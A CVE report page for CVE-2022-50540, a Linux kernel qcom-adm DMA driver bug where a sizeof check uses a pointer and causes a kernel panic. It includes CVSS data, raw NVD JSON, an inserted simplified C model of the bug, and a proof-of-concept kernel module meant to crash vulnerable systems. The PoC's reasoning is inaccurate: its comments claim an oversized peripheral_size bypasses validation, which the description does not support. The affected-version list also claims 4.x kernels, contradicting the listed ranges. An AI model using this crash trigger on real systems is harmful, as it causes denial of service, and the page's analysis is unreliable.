Security Vulnerability Report
CVE-2022-50540 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:38
Last Modified: 2026-02-26 23:16:43
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

dmaengine: qcom-adm: fix wrong sizeof config in slave_config

Fix the broken slave_config function, which incorrectly compares peripheral_size with the size of the config pointer instead of the size of the config struct. This causes the crci value to be ignored and causes a kernel panic on any slave that uses the adm driver.

To fix this, compare to the size of the struct and NOT the size of the pointer.
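The sizeof mix-up described above, shown as an added, simplified C model (not the kernel's code or the page's PoC): the struct and function names are constructed stand-ins, and the check is reduced to the one comparison the commit message talks about. The buggy variant compares against the size of a pointer, so a caller that correctly advertises the size of its peripheral block never matches and its CRCI setting is silently dropped.

```c
#include <stddef.h>
#include <stdint.h>

/* Constructed stand-ins for the kernel types (not the kernel's definitions).
 * The peripheral block is padded so its size differs from a pointer on both
 * 32- and 64-bit targets, which keeps the demonstration deterministic. */
struct adm_peripheral_config {
    uint32_t crci;
    uint32_t flags;
    uint64_t reserved;
};

struct slave_config {
    void *peripheral_config;  /* points at an adm_peripheral_config */
    size_t peripheral_size;   /* caller states the size of that block */
};

struct adm_chan {
    uint32_t crci;            /* 0 means "no CRCI programmed" */
};

/* Vulnerable shape of the check: 'config' is a pointer, so sizeof(config)
 * is the pointer size and never equals the struct size the caller set. */
int adm_slave_config_buggy(struct adm_chan *achan, const struct slave_config *cfg)
{
    const struct adm_peripheral_config *config = cfg->peripheral_config;

    achan->crci = 0;
    if (config && cfg->peripheral_size == sizeof(config))
        achan->crci = config->crci;
    return achan->crci != 0;
}

/* Fixed shape: compare against the size of the pointed-to struct. */
int adm_slave_config_fixed(struct adm_chan *achan, const struct slave_config *cfg)
{
    const struct adm_peripheral_config *config = cfg->peripheral_config;

    achan->crci = 0;
    if (config && cfg->peripheral_size == sizeof(*config))
        achan->crci = config->crci;
    return achan->crci != 0;
}

/* Constructed caller in the style of a slave driver: fill the peripheral
 * block, advertise its real size, and report whether the CRCI was applied. */
int demo_crci_applied(int use_fixed)
{
    struct adm_peripheral_config pcfg = { .crci = 3, .flags = 0, .reserved = 0 };
    struct slave_config cfg = { .peripheral_config = &pcfg,
                                .peripheral_size = sizeof(pcfg) };
    struct adm_chan chan = { .crci = 0 };

    return use_fixed ? adm_slave_config_fixed(&chan, &cfg)
                     : adm_slave_config_buggy(&chan, &cfg);
}
```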

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (5.17 <= version < 5.19.17) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (6.0 <= version < 6.0.3) - VULNERABLE
Linux Kernel < 6.0 (versions containing the qcom-adm driver)
Linux Kernel 5.x series (affected stable versions)
Linux Kernel 4.x series (some versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2022-50540 PoC - Trigger kernel panic via qcom-adm slave_config
// This PoC demonstrates how to trigger the vulnerability by calling
// the dmaengine slave_config with a malformed peripheral_size value
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dmaengine.h>
#include <linux/dma-mapping.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Researcher");
MODULE_DESCRIPTION("PoC for CVE-2022-50540 qcom-adm sizeof bug");

static int __init poc_init(void)
{
    struct dma_chan *chan;
    struct dma_slave_config config = {0};
    int ret;

    // Request a DMA channel from qcom-adm driver
    // On vulnerable systems, this will succeed if the platform uses ADM
    chan = dma_request_chan(NULL, "qcom-adm");
    if (IS_ERR(chan)) {
        pr_info("CVE-2022-50540: Failed to get qcom-adm channel\n");
        return PTR_ERR(chan);
    }

    // Set peripheral_size to an invalid large value
    // Due to the sizeof bug, this value bypasses validation
    // because it's compared against sizeof(pointer)=8 instead of
    // sizeof(struct dma_slave_config)
    config.peripheral_size = 0xFFFFFFFF; // Invalid size
    config.direction = DMA_MEM_TO_DEV;
    config.src_addr = 0x0;
    config.dst_addr = 0x0;
    // crci value is ignored due to the bug
    config.slave_id = 0xDEADBEEF;

    // Trigger the vulnerable slave_config function
    // On vulnerable kernels, this will cause kernel panic
    ret = dmaengine_slave_config(chan, &config);
    if (ret < 0) {
        pr_info("CVE-2022-50540: slave_config returned %d\n", ret);
    }

    dma_release_channel(chan);
    return 0;
}

static void __exit poc_exit(void)
{
    pr_info("CVE-2022-50540: PoC module unloaded\n");
}

module_init(poc_init);
module_exit(poc_exit);

References

https://git.kernel.org/stable/c/7490274b41a432824f7df5071ace3df2ab59caa7 (Patch)
https://git.kernel.org/stable/c/7c8765308371be30f50c1b5b97618b731514b207 (Patch)
https://git.kernel.org/stable/c/f1dd45a6585a1689e1e8906b3f9e302b9d40c715 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50540", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.320", "lastModified": "2026-02-26T23:16:43.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: qcom-adm: fix wrong sizeof config in slave_config\n\nFix broken slave_config function that uncorrectly compare the\nperipheral_size with the size of the config pointer instead of the size\nof the config struct. This cause the crci value to be ignored and cause\na kernel panic on any slave that use adm driver.\n\nTo fix this, compare to the size of the struct and NOT the size of the\npointer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17", "versionEndExcluding": "5.19.17", "matchCriteriaId": "CD3C570A-0615-41B8-962A-EA2AACAEB3BF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7490274b41a432824f7df5071ace3df2ab59caa7", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c8765308371be30f50c1b5b97618b731514b207", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f1dd45a6585a1689e1e8906b3f9e302b9d40c715", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}